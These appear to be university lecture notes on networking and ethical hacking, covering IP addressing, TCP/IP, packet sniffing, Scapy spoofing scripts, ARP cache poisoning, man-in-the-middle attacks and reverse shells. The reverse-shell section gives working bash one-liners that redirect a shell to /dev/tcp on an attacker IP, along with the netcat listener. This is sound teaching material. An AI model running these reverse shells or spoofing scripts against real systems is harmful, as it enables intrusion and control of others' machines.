Week 9: Networks 1 - Ethical Hacking and Pentesting

Networking Basics (Recall)

  • IP Address and Network Interface:
    • Original IP Addressing Scheme
      • Class A: Begins with 0 (0.0.0.0 to 127.255.255.255)
      • Class B: Begins with 10 (128.0.0.0 to 191.255.255.255)
      • Class C: Begins with 110 (192.0.0.0 to 223.255.255.255)
      • Class D: Begins with 1110 (224.0.0.0 to 239.255.255.255)
      • Class E: Begins with 11110 (240.0.0.0 to 255.255.255.255)
    • CIDR (Classless Inter-Domain Routing) Scheme:
      • Uses a suffix to indicate the number of bits in the network ID (e.g., 192.168.60.5/24 indicates the first 24 bits are the network ID).
      • Example: What is the address range of the network 192.168.192.0/19?
    • Special IP Addresses:
      • Private IP Addresses:
        • 10.0.0.0/8
        • 172.16.0.0/12
        • 192.168.0.0/16
      • Loopback Address:
        • 127.0.0.0/8 (commonly 127.0.0.1)
    • Listing IP Addresses:
      • Using the command: $ ip -br address
      • Example output includes interfaces like lo, enp0s3, docker0 with their respective IP addresses and other details.
    • Manually Assigning IP Addresses:
      • Command: $ sudo ip addr add 192.168.60.6/24 dev enp0s3
      • This assigns the IP address 192.168.60.6 with a /24 subnet mask to the enp0s3 interface.
    • Automatically Assigning IP Addresses:
      • DHCP (Dynamic Host Configuration Protocol)
    • DNS (Domain Name System):
      • Used to get IP addresses for hostnames.
      • Example using dig: $ dig www.example.com
      • Returns the IP address associated with the domain name.

TCP/IP Protocols

  • Network Stack:
    • A layered architecture for network communication.
  • Packet Journey:
    • A packet travels from source A to destination B through multiple routers and networks.
  • Packet Construction:
    • Application Layer: Creates the data.
    • Transport Layer: Adds TCP or UDP header with source and destination ports.
    • Network Layer: Adds IP header with source and destination IP addresses.
    • MAC Layer: Adds MAC header with source and destination MAC addresses.
  • Transport Layer (Layer 4):
    • Includes source and destination ports.
    • Uses TCP or UDP headers.
  • Network Layer (Layer 3):
    • Constructs packets and handles routing.
    • Includes source and destination IP addresses.
  • Data Link Layer (Layer 2):
    • Adds MAC header with destination and source addresses.
  • Sending Packets in Python:
    • UDP Client Example:
      python #!/usr/bin/python3 import socket IP = "127.0.0.1" PORT = 9090 data = b'Hello, World!' sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(data, (IP, PORT))
    • UDP Server Example:
      python #!/usr/bin/python3 import socket IP = "0.0.0.0" PORT = 9090 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((IP, PORT)) while True: data, (ip, port) = sock.recvfrom(1024) print("Sender: {} and Port: {}".format(ip, port)) print("Received message: {}".format(data))
  • Receiving Packets:
    • Packets are received through the network interface card (NIC) and processed up the network stack.
  • Routing:
    • Routing tables determine the path packets take.
  • ip route Command:
    • Used to display and manipulate the routing table.
    • Examples:
      • # ip route (shows the routing table)
      • # ip route get 10.9.0.1 (gets the route for 10.9.0.1)
  • Packet Sending Tools:
    • netcat (nc):
      • $ nc <ip> <port> (sends TCP packet)
      • $ nc -u <ip> <port> (sends UDP packet)
      • $ echo "data" > /dev/udp/<ip>/<port>
      • $ echo "data" > /dev/tcp/<ip>/<port>
    • Others: telnet, ping, etc.

Packet Sniffing

  • Packet Reception Process:
    • Link-level driver captures packets and stores them in a ring buffer.
    • The kernel's protocol stack processes the packets.
  • Getting a Copy of Packets:
    • Packet sniffing involves capturing a copy of packets for analysis.
  • Packet Sniffing Tools:
    • Tcpdump: Command-line tool, good for containers.
    • Wireshark: GUI-based tool, good for environments supporting a GUI.

Packet Spoofing

  • Normal Packet Construction:
    • Users can set some header fields.
    • The OS sets other fields.
  • Packet Spoofing:
    • Setting arbitrary header fields using tools.
  • **Spoofing ICMP Packets (using Scapy):
    python #!/usr/bin/python3 from scapy.all import * print("SENDING SPOOFED ICMP PACKET...") ip = IP(src="1.2.3.4", dst="93.184.216.34") icmp = ICMP() pkt = ip/icmp pkt.show() send(pkt, verbose=0)
  • Spoofing UDP Packets (using Scapy):
    python #!/usr/bin/python3 from scapy.all import * print("SENDING SPOOFED UDP PACKET...") ip = IP(src="1.2.3.4", dst="10.0.2.69") # IP Layer udp = UDP(sport=8888, dport=9090) # UDP Layer data = "Hello UDP!\n" # Payload pkt = ip/udp/data pkt.show() send(pkt, verbose=0)
  • Other Uses of Scapy:
    • send(): Send packets at Layer 3.
    • sendp(): Send packets at Layer 2.
    • sr(): Sends packets at Layer 3 and receives answers.
    • srp(): Sends packets at Layer 2 and receives answers.
    • srl(): Sends packets at Layer 3 and waits for the first answer.
    • srlp(): Sends packets at Layer 2 and waits for the first answer.
    • srloop(): Send a packet at Layer 3 in a loop and print the answer each time.
    • srploop(): Send a packet at Layer 2 in a loop and print the answer each time.

ARP Protocol and Attacks

  • Network Interface:
    • Physical or logical link between a computer and a network.
    • Each NIC has a hardware address: MAC address.
  • Packet Flow:
    • Packets flow through the link-level driver, ring buffer, and protocol stack.
  • Physical and Virtual NICs:
    • Physical interface.
    • Loopback/dummy interface.
    • tun/tap interface.
  • Examples of Virtual NIC:
    • Loopback Interface:
      • $ ifconfig lo
      • Typically has the IP address 127.0.0.1.
    • Dummy Interface:
      • # ip link add dummy1 type dummy
      • # ip addr add 1.2.3.4/24 dev dummy1
      • # ip link set dummy1 up
  • Ethernet Frame & MAC Header:
    • MAC Header (Ethernet Header): 14 bytes.
    • Contains destination MAC address, source MAC address, EtherType, data, and checksum.
  • Ethernet Frame Example:
    • Shows the structure of an Ethernet frame with source and destination MAC addresses and the encapsulated IP packet.
  • Promiscuous Mode:
    • NIC normally checks the destination MAC address.
    • In promiscuous mode, the NIC accepts all packets on the local network, regardless of the destination MAC address. Useful for packet sniffing.
  • MAC Address Randomization:
    • Used for privacy to prevent tracking by randomizing the MAC address.

The ARP Protocol

  • ARP (Address Resolution Protocol):
    • Used to find the MAC address associated with an IP address on a local network.
  • ARP Request/Reply:
    • A host broadcasts an ARP request to find the MAC address of another host.
    • The target host responds with an ARP reply containing its MAC address.
  • ARP Message Format:
    • Includes hardware type, protocol type, hardware size, protocol size, opcode, sender MAC address, sender IP address, target MAC address, and target IP address.
  • ARP Cache:
    • Used to store recently resolved IP-to-MAC address mappings to avoid sending frequent ARP requests.
    • Command: arp -n

ARP Cache Poisoning Attack

  • ARP Cache Poisoning:
    • Spoofing ARP messages (request, reply, gratuitous) to inject false IP-to-MAC address mappings into the ARP cache of victim machines.
  • Spoofing Gratuitous Message:
    • Special type of ARP message with source IP = destination IP and destination MAC = broadcast address.

Man-In-The-Middle Attack

  • Man-In-The-Middle (MITM) Attack:
    • An attacker intercepts and potentially alters communications between two parties without their knowledge.
    • Uses ARP cache poisoning to redirect packets.
  • Using ARP Cache Poisoning to Redirect Packets:
    • Poison A's ARP cache so that B's IP is mapped to M's (attacker's) MAC address.
    • Poison B's ARP cache so that A's IP is mapped to M's MAC address.
  • Implication:
    • The attacker can receive packets sent from A to B and B to A, enabling various attacks using sniffing and spoofing.

Reverse Shell (Recall)

  • File Descriptor:
    • A number that uniquely identifies an open file or input/output resource.
  • File Descriptor Table:
    • Associates file descriptors with open files.
    • Standard file descriptors: 0 (stdin), 1 (stdout), 2 (stderr).
  • Standard I/O Devices:
    • Standard input (stdin): typically the keyboard.
    • Standard output (stdout): typically the screen.
    • Standard error (stderr): typically the screen.
  • Redirection:
    • Changing the default input or output stream of a command.
    • Examples:
      • $ echo "hello world" > /tmp/xyz (redirects output to a file)
      • $ cat < /etc/passwd (redirects input from a file)
  • Output Redirection to TCP Connections:
    • Using dup2 to redirect standard output to a TCP socket.
  • Input Redirection to TCP Connections:
    • Using dup2 to redirect standard input from a TCP socket.
  • Redirection to TCP from Shell:
    • Using /dev/tcp/<ip>/<port> in bash for redirection.
  • Reverse Shell Overview:
    • Attacker Machine listens for a connection.
    • Victim Machine connects to the Attacker Machine and redirects its shell's input and output to the connection.
  • Redirecting Standard Output:
    • On Attacker Machine: $ nc -lv 9090
    • On Server Machine: Server:$ /bin/bash -i > /dev/tcp/10.0.2.70/9090
  • Redirecting Standard Input & Output:
    • On Server Machine: Server:$ /bin/bash -i > /dev/tcp/10.0.2.70/9090 0<&1
  • Redirecting Standard Error, Input, & Output:
    • On Server Machine: $ /bin/bash -i > /dev/tcp/10.0.2.70/9090 0<&1 2>&1
  • Reverse Shell via Code Injection:
    • Using injected code to execute a reverse shell.
    • First run bash: command bash
  • Summary:
    • Reverse shell works by redirecting a shell program’s input and output.
    • Input and output of a program can be redirected to a TCP connection.
    • It is a widely used technique by attackers.